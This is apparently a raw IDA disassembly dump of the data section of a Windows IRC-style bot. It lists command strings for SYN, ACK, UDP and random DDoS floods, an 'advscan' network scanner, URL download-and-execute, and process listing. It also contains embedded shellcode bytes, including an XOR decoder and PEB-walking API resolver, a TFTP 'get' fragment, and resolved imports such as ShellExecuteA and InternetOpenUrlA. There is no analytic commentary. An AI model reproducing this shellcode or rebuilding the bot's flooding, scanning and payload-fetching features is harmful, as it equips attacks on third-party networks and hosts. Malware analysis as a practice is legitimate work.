db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
; char aDdos_syn_0[]
aDdos_syn_0 db 'ddos.syn',0 ; DATA XREF: sub_40ABFE+3D22�o
align 4
; char aDdos_ack_0[]
aDdos_ack_0 db 'ddos.ack',0 ; DATA XREF: sub_40ABFE+3D3F�o
align 4
; char aDdos_random_0[]
aDdos_random_0 db 'ddos.random',0 ; DATA XREF: sub_40ABFE+3D5C�o
; char aDdosFailedToSt[]
aDdosFailedToSt db '[DDOS]: Failed to start ddos thread, error: <%d>.',0
; DATA XREF: sub_40ABFE+3E9B�o
align 4
; char aDdos_udp[]
aDdos_udp db 'ddos.udp',0 ; DATA XREF: sub_40ABFE+3EF7�o
align 4
; char aDdosFailedTo_0[]
aDdosFailedTo_0 db '[DDOS]: Failed to start ddos thread, error: <%d>.',0
; DATA XREF: sub_40ABFE+400E�o
align 4
; char unk_423548
unk_423548 db 2 ; DATA XREF: sub_40ABFE+41E3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 4
; char unk_423584
unk_423584 db 2 ; DATA XREF: sub_40ABFE+4273�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
align 4
; char aAdvscan[]
aAdvscan db 'advscan',0 ; DATA XREF: sub_40ABFE+42E7�o
; char aScanAlreadyDSc[]
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_40ABFE+4332�o
align 4
; char aScanFailedTo_0[]
aScanFailedTo_0 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_40ABFE+44DD�o
align 4
; char aScanFailedTo_1[]
aScanFailedTo_1 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_40ABFE:loc_40F2B8�o
align 4
aRandom_0 db 'Random',0 ; DATA XREF: sub_40ABFE+47FB�o
align 10h
aSequential_0 db 'Sequential',0 ; DATA XREF: sub_40ABFE:loc_40F405�o
align 4
; char aScanSPortScanS[]
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_40ABFE+4836�o
db 'for %d minutes using %d threads.',0
align 10h
; char aScanFailedTo_2[]
aScanFailedTo_2 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_40ABFE+48C5�o
align 4
aSedebugprivi_1 db 'SeDebugPrivilege',0 ; DATA XREF: sub_40F5A7+5D�o
align 4
; char aSD_0[]
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_40F5A7+127�o
align 4
; char aSD_1[]
aSD_1 db ' %s (%d)',0 ; DATA XREF: sub_40F5A7+14A�o
align 10h
; char aSD_2[]
aSD_2 db ' %s (%d)',0 ; DATA XREF: sub_40F5A7+16D�o
align 4
aSedebugprivi_2 db 'SeDebugPrivilege',0 ; DATA XREF: sub_40F5A7+211�o
align 10h
; char unk_423770
unk_423770 db 2 ; DATA XREF: sub_40F7C9+2C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aListingProcess db 'Listing processes:',0
align 4
; char unk_4237A4
unk_4237A4 db 2 ; DATA XREF: sub_40F7C9+89�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessListCom db 'Process list completed.',0
; char unk_4237DC
unk_4237DC db 2 ; DATA XREF: sub_40F7C9:loc_40F867�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessListFai db 'Process list failed.',0
align 8
aConst db 'const',0 ; DATA XREF: sub_40FD9A+24�o
align 10h
dd 0
dword_423824 dd 2 off_423828 dd offset sub_40F94E ; DATA XREF: sub_40FD9A+64�r
aLetter db 'letter',0
align 4
dd 2 dup(0)
dd offset sub_40F9B6
aCountryos db 'countryos',0
align 4
dd 1, 40FB81h
; char aS_4[]
aS_4 db '%s',0 ; DATA XREF: sub_40F94E+16�o
align 4
; char aSI[]
aSI db '%s%i',0 ; DATA XREF: sub_40F94E+4F�o
align 10h
aPc db 'PC',0 ; DATA XREF: .text:0040FA1D�o
align 4
aPc_0 db 'PC',0 ; DATA XREF: .text:0040FA4D�o
align 4
aPc_1 db 'PC',0 ; DATA XREF: .text:0040FAAE�o
align 4
aSI_0 db '%s%i',0 ; DATA XREF: .text:0040FAEC�o
align 4
aS_3 db '%s|',0 ; DATA XREF: .text:0040FB2F�o
aSI_1 db '%s%i',0 ; DATA XREF: .text:0040FB68�o
align 10h
a95_0 db '95',0 ; DATA XREF: .text:0040FBCA�o
align 4
aNt_0 db 'NT',0 ; DATA XREF: .text:0040FBDA�o
align 4
a98_0 db '98',0 ; DATA XREF: .text:0040FBF8�o
align 4
aMe_1 db 'ME',0 ; DATA XREF: .text:0040FC13�o
align 10h
a2k_0 db '2K',0 ; DATA XREF: .text:0040FC2E�o
align 4
aXp_0 db 'XP',0 ; DATA XREF: .text:0040FC49�o
align 4
a23 db '23',0 ; DATA XREF: .text:0040FC64�o
align 4
aUn db 'UN',0 ; DATA XREF: .text:loc_40FC6D�o
align 10h
aSp0 db 'SP0',0 ; DATA XREF: .text:0040FC8B�o
a1: ; DATA XREF: .text:loc_40FC97�o
unicode 0, <1>,0
aSp1 db 'SP1',0 ; DATA XREF: .text:0040FCAE�o
a2: ; DATA XREF: .text:loc_40FCB7�o
unicode 0, <2>,0
aSp2 db 'SP2',0 ; DATA XREF: .text:0040FCCE�o
a3: ; DATA XREF: .text:loc_40FCD7�o
unicode 0, <3>,0
aSp3 db 'SP3',0 ; DATA XREF: .text:0040FCEE�o
a4: ; DATA XREF: .text:loc_40FCF7�o
unicode 0, <4>,0
aSp4 db 'SP4',0 ; DATA XREF: .text:0040FD0E�o
aUnk db 'UNK',0 ; DATA XREF: .text:loc_40FD17�o
aSSS_0 db '%s|%s|%s|',0 ; DATA XREF: .text:0040FD48�o
align 4
aSI_2 db '%s%i',0 ; DATA XREF: .text:0040FD81�o
align 4
dword_4238DC dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh db 66h, 0B9h
word_4238EA dw 0FFFFh ; DATA XREF: sub_410081:loc_4101C8�o
db 80h, 73h, 0Eh
byte_4238EF db 0FFh ; DATA XREF: sub_410081+15B�w
dd 0F9E243h
dword_4238F4 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh db 0B1h
byte_423901 db 0FFh ; DATA XREF: sub_410081+11F�w
dw 7380h
db 0Ch
byte_423905 db 0FFh ; DATA XREF: sub_410081+127�w
dw 0E243h
dd 0F9h
dword_42390C dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40FE3E+8D�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_423970 dd 12h, 70746674h, 6578652Eh, 20692D20haGet db ' get ',0 ; DATA XREF: sub_40FE3E+CA�o
; sub_40FE3E+107�o
aJ db 'j',0
db 0E8h
byte_423989 db 17h, 2 dup(0) ; DATA XREF: sub_40FE3E+63�o
dd 0C3017500h
db 0E8h
byte_423991 db 1, 2 dup(0) ; DATA XREF: sub_40FE3E+53�o
db 0
byte_423995 db 0, 6Ah, 0 ; DATA XREF: sub_40FE3E+144�o
dd 7E8h
db 0, 0Fh, 84h
byte_42399F db 0EDh ; DATA XREF: sub_40FE3E+75�o
dd 0C3FFFFFFh, 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h
dd 44B0AAF3h, 515257ABh, 6A286A51h, 55515101h, 83D6FF53h
dd 0C08554C4h, 0C3h
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_410340+E�o
; char aD_S_0[]
aD_S_0 db '%d. %s',0 ; DATA XREF: sub_410340+75�o
align 4
; char aSSStopped_DThr[]
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_410663+47�o
; char aSNoSThreadFoun[]
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_410663+63�o
align 10h
dword_423A30 dd 173Fh dd 9875h, 9873h
off_423A3C dd offset __fpmath ; DATA XREF: __cinit�r
dd offset nullsub_1
dd offset nullsub_1
dword_423A48 dd 1B3Fh dword_423A4C dd 19930520h, 4 dup(0) ; __NLG_Notify+2�o
dword_423A60 dd 2EE3689Dh align 10h
off_423A70 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_423A74 dd 2 ; __NMSG_WRITE+46�r ...
dd 10h
dword_423A7C dd 3F8h ; _realloc+4D�r ...
off_423A80 dd offset aNull ; DATA XREF: __output:loc_413EAA�r
; __output+457�r
; "(null)"
off_423A84 dd offset aNull_0 ; DATA XREF: __output+259�r
; "(null)"
dword_423A88 dd 14h off_423A8C dd offset aExp_2 ; DATA XREF: __get_fname:loc_4149D0�r
; "exp"
dd 1Dh, 41C394h, 1Ah, 41C390h, 1Bh, 41C388h, 1Fh, 41C380h
dd 13h, 41C378h, 21h, 41C370h, 0Eh, 41C368h, 0Dh, 41C360h
dd 0Fh, 41C358h, 10h, 41C350h, 5, 41C348h, 1Eh, 41C344h
dd 12h, 41C340h, 20h, 41C33Ch, 0Ch, 41C334h, 0Bh, 41C32Ch
dd 15h, 41C324h, 1Ch, 41C31Ch, 19h, 41C314h, 11h, 41C30Ch
dd 18h, 41C304h, 16h, 41C2FCh, 17h, 41C2F4h, 22h, 41C2F0h
dd 23h, 41C2ECh, 24h, 41C2E8h
dbl_423B60 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+B7�r
; __handle_exc:loc_4147D5�r ...
dd 0
dd 0FFF80000h
dbl_423B70 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+92�r
; __handle_exc:loc_4147AD�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_423B88 dt 2.3562723457267347066e313 ; DATA XREF: __set_statfp+D�r
; __set_statfp+1F�r
align 4
tbyte_423B94 dt 1.9149954921904370718e-1233 ; DATA XREF: __set_statfp+31�r
align 10h
off_423BA0 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+F�w
; __output+3AA�r
off_423BA4 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+5�w
; __output+3E2�r
off_423BA8 dd offset __fassign ; DATA XREF: __cfltcvt_init+14�w
; __input+430�r
off_423BAC dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+1E�w
; __output+3CB�r
off_423BB0 dd offset __positive ; DATA XREF: __cfltcvt_init+28�w
off_423BB4 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+32�w
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 10h
dd offset sub_4158EC
off_423BC4 dd offset sub_4158EC ; DATA XREF: sub_415942+29�r
off_423BC8 dd offset __wctype+2 ; DATA XREF: _strtoxl:loc_411BB4�r
; _strtoxl:loc_411C71�r ...
dd offset __wctype+2
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .data:off_423BC8�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
; size_t SrcSizeInBytes
SrcSizeInBytes dd 1 ; DATA XREF: _strtoxl:loc_411B9C�r
; _strtoxl:loc_411C59�r ...
byte_423DD8 db 2Eh ; DATA XREF: __forcdecpt:loc_414CAA�r
; __cropzeros+4�r ...
align 4
dd 1
asc_423DE0 db ' ',9,'-',0Dh,']',0 ; DATA XREF: __input:loc_4161CB�o
align 4
asc_423DE8: ; DATA XREF: __input:loc_4160BB�o
unicode 0, <]>,0
align 10h
dword_423DF0 dd 0FFFFFFFFh, 0A00h ; __filbuf:loc_416981�o
byte_423DF8 db 1 ; DATA XREF: __setmbcp+E1�r
db 2, 4, 8
align 10h
dword_423E00 dd 3A4h dword_423E04 dd 82798260h dd 21h, 0
dword_423E10 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_423EF0 dd 0C0000005h ; _xcptlookup+A�r ...
dword_423EF4 dd 0Bh dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423F68 dd 3 ; _raise+C8�r
dword_423F6C dd 7 ; _raise+CD�r
dword_423F70 dd 0Ah ; _siglookup+4�r
dword_423F74 dd 8Ch ; __XcptFilter+8F�w ...
dword_423F78 dd 2 ; __NMSG_WRITE+28�r
off_423F7C dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41C6B8h, 9, 41C68Ch, 0Ah, 41C668h, 10h, 41C63Ch
dd 11h, 41C60Ch, 12h, 41C5E8h, 13h, 41C5BCh, 18h, 41C584h
dd 19h, 41C55Ch, 1Ah, 41C524h, 1Bh, 41C4ECh, 1Ch, 41C4C4h
dd 78h, 41C4B4h, 79h, 41C4A4h, 7Ah, 41C494h, 0FCh, 41C490h
dd 0FFh, 41C480h
off_424008 dd offset dword_4705A0 ; DATA XREF: __NMSG_WRITE+1B�o
; ___initstdio+55�o
align 10h
dd offset dword_4705A0
dd 101h
dword_424018 dd 0FFFFFFFFh, 0 dd 1000h, 0
dword_424028 dd 3 dup(0) dd 2, 0FFFFFFFFh, 3 dup(0)
dword_424048 dd 3 dup(0) dd 2, 0FFFFFFFFh, 7 dup(0)
dword_424078 dd 84h dup(0) dword_424288 dd 2694h ; __except1+46�r ...
align 10h
dword_424290 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_4242A8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fhdword_4242C0 dd 1 dword_4242C4 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_424428 dd 7080h ; __dosmaperr+19�o ...
dword_42442C dd 1 ; __tzset+8B�w ...
dword_424430 dd 0FFFFF1F0h ; __tzset+94�w ...
dword_424434 dd 545350h, 0Fh dup(0)dword_424474 dd 544450h, 0Fh dup(0); LPSTR lpMultiByteStr
lpMultiByteStr dd offset dword_424434 ; DATA XREF: __tzset+BA�r __tzset+D9�r ...
; LPSTR off_4244B8
off_4244B8 dd offset dword_424474 ; DATA XREF: __tzset+F4�r __tzset+11B�r ...
align 10h
dword_4244C0 dd 0FFFFFFFFh dword_4244C4 dd 0 ; _cvtdate+BF�w
dword_4244C8 dd 0 ; _cvtdate+E0�w
align 10h
dword_4244D0 dd 0FFFFFFFFh dword_4244D4 dd 0 ; _cvtdate+EA�w ...
dword_4244D8 dd 0 ; _cvtdate+23�r ...
dword_4244DC dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_42450C dd 16Dh ; _cvtdate+2E�r ...
dword_424510 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_424548 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4246A8 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_424804 dd offset off_41C898 ; DATA XREF: .rdata:off_41C8E0�o
; .rdata:0041CA44�o ...
dd 0
a_?avexception@ db '.?AVexception@@',0
off_42481C dd offset off_41C898 ; DATA XREF: .rdata:off_41C8F8�o
; .rdata:0041C938�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_42483C dd offset off_41C898 ; DATA XREF: .rdata:off_41C940�o
; .rdata:0041C984�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_42485C dd offset off_41C898 ; DATA XREF: .rdata:off_41C98C�o
; .rdata:0041C9D0�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
off_424880 dd offset off_41C898 ; DATA XREF: .rdata:off_41C9D8�o
; .rdata:0041CA14�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
dd 2 dup(0)
byte_4248A4 db 0 ; DATA XREF: sub_401000+38�r
align 4
dword_4248A8 dd 0 dword_4248AC dd 0 byte_4248B0 db 0 ; DATA XREF: sub_40110C+38�r
align 8
dword_4248B8 dd 2 dup(0) dword_4248C0 dd 0 dword_4248C4 dd 2 dup(0) byte_4248CC db 0 ; DATA XREF: .text:00403B2D�o
; .text:00403B58�o ...
align 10h
dd 3Fh dup(0)
word_4249CC dw 0 ; DATA XREF: sub_403564+1C�r
align 10h
dword_4249D0 dd 2 dup(0) dword_4249D8 dd 2 dup(0) dword_4249E0 dd 2 dup(0) ; SOCKET s
s dd 0 ; DATA XREF: sub_404498+27�w
; sub_404498+51�r ...
; u_short hostshort
hostshort dd 0 ; DATA XREF: .text:004029EB�r
; sub_403C1E+6E�w ...
dd 2 dup(0)
byte_4249F8 db 0 ; DATA XREF: StartAddress+2F4�r
align 10h
dword_424A00 dd 0 ; sub_405254+58�r ...
dword_424A04 dd 0 ; sub_405A2E+DB�w ...
dd 3E6h dup(0)
; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <0> ; DATA XREF: sub_405759+146�o
; sub_405759+1D1�o ...
dword_4259B8 dd 0 ; sub_404F31+2AA�o
; char byte_4259BC[]
byte_4259BC db 104h dup(0) ; DATA XREF: sub_404F31+1E4�o
; sub_404F31+26A�o
; char byte_425AC0[]
byte_425AC0 db 104h dup(0) ; DATA XREF: sub_404F31+1FB�o
; sub_404F31:loc_405196�o
dword_425BC4 dd 0 ; sub_404F31+2BE�r ...
dword_425BC8 dd 0 dword_425BCC dd 0 ; sub_404F31+26F�r
; char byte_425BD0[]
byte_425BD0 db 80h dup(0) ; DATA XREF: sub_404F31+22F�o
; sub_404F31+251�o
dword_425C50 dd 0 dword_425C54 dd 0 ; sub_404F31+25E�w
dword_425C58 dd 0 align 10h
dword_425C60 dd 0 ; sub_404F31+E7�r ...
; char Filename[]
Filename db 104h dup(0) ; DATA XREF: sub_404F31+54�o
; sub_404F31+DA�o
; char byte_425D68[]
byte_425D68 db 104h dup(0) ; DATA XREF: sub_404F31+6B�o
; sub_404F31:loc_405006�o
dword_425E6C dd 0 ; sub_404F31+13D�r ...
dword_425E70 dd 0 word_425E74 dw 0 ; DATA XREF: sub_404F31+42�w
; sub_404F31+DF�r
; char byte_425E76[]
byte_425E76 db 82h dup(0) ; DATA XREF: sub_404F31+9F�o
; sub_404F31+C1�o
dword_425EF8 dd 0 dword_425EFC dd 0 ; sub_404F31+CE�w
dword_425F00 dd 0 align 8
; char byte_425F08
byte_425F08 db 0 ; DATA XREF: sub_406B0C+348�w
; sub_406B0C+432�o
align 2
word_425F0A dw 0 ; DATA XREF: sub_406B0C+35A�w
word_425F0C dw 0 ; DATA XREF: sub_406B0C+360�w
word_425F0E dw 0 ; DATA XREF: sub_406B0C+369�w
byte_425F10 db 0 ; DATA XREF: sub_406B0C+371�w
byte_425F11 db 0 ; DATA XREF: sub_406B0C+378�w
word_425F12 dw 0 ; DATA XREF: sub_406B0C+37F�w
dword_425F14 dd 0 dword_425F18 dd 0 word_425F1C dw 0 ; DATA XREF: sub_406B0C+3EA�w
word_425F1E dw 0 ; DATA XREF: sub_406B0C+3C6�w
; sub_406B0C+3D7�w
word_425F20 dw 0 ; DATA XREF: sub_406B0C+3FC�w
word_425F22 dw 0 ; DATA XREF: sub_406B0C+3A4�w
dword_425F24 dd 101h dup(0) dword_426328 dd 77F16CA6h ; resolved to->GDI32.DeleteDC ; sub_407087+510�r
dword_42632C dd 7C863ED8h ; resolved to->KERNEL32.Module32First ; sub_40F5A7+110�r
dword_426330 dd 771D35B1h ; resolved to->WININET.InternetGetConnectedStateExA ; sub_407087+9D8�r ...
dword_426334 dd 5B89425Ch ; sub_407087+BAA�r
dword_426338 dd 5B8706B8h ; sub_407087+B74�r
dword_42633C dd 77F159A0h ; resolved to->GDI32.SelectObject ; sub_407087+4FE�r
dword_426340 dd 5B894058h ; sub_407087+BA1�r
dword_426344 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA ; sub_407087+3E4�r ...
dword_426348 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_42634C dd 7C827421h ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_407087+113�r
dword_426350 dd 5B8705E8h ; sub_407087+B6B�r
dword_426354 dd 771C8840h ; resolved to->WININET.InternetCrackUrlA ; sub_407087+A0E�r
dword_426358 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_407087+34E�r
dword_42635C dd 771C6FDDh ; resolved to->WININET.InternetOpenUrlA ; sub_407087+A05�r ...
dword_426360 dd 7C8256DAh ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_407087+140�r
dword_426364 dd 771C9555h ; resolved to->WININET.InternetReadFile ; sub_407087+A17�r ...
dword_426368 dd 71AC0979h ; resolved to->WS2_32.WSAAsyncSelect ; sub_407087+7C2�r
dword_42636C dd 7C863C00h ; resolved to->KERNEL32.Process32Next ; sub_405D52+126�r ...
dword_426370 dd 76F3792Eh ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_407087+C29�r ...
dword_426374 dd 7C80A417h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_407087+137�r
dword_426378 dd 77F1A147h ; resolved to->GDI32.GetDIBColorTable ; sub_407087+4F5�r
dword_42637C dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_407087+686�w
dword_426380 dd 5B8A2F01h ; sub_407087+B98�r
dword_426384 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_407087+851�r
dword_426388 dd 71B25099h ; sub_407087+D24�w ...
dword_42638C dd 771D73E0h ; resolved to->WININET.InternetGetConnectedState ; sub_407087+9CF�r ...
dword_426390 dd 77D89E6Dh ; resolved to->USER32.ExitWindowsEx ; sub_407087+27F�r ...
dword_426394 dd 5B868FC1h ; sub_407087+B7D�r
dword_426398 dd 71AC0B50h ; resolved to->WS2_32.getpeernamedword_42639C dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_40634F+1C3�r ...
dword_4263A0 dd 77F16A3Bh ; resolved to->GDI32.DeleteObject ; sub_407087+519�r
dword_4263A4 dd 5B894439h ; sub_407087+BB3�r
dword_4263A8 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA ; sub_407087+357�r ...
dword_4263AC dd 7C834373h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_407087+11C�r
dword_4263B0 dd 7CA0FE44h ; resolved to->SHELL32.ShellExecuteA ; sub_407087+DA8�r ...
dword_4263B4 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_407087+569�w ...
dword_4263B8 dd 771C76B8h ; resolved to->WININET.HttpSendRequestA ; sub_407087+9EA�r
dword_4263BC dd 5B897AE1h ; sub_407087+B86�r
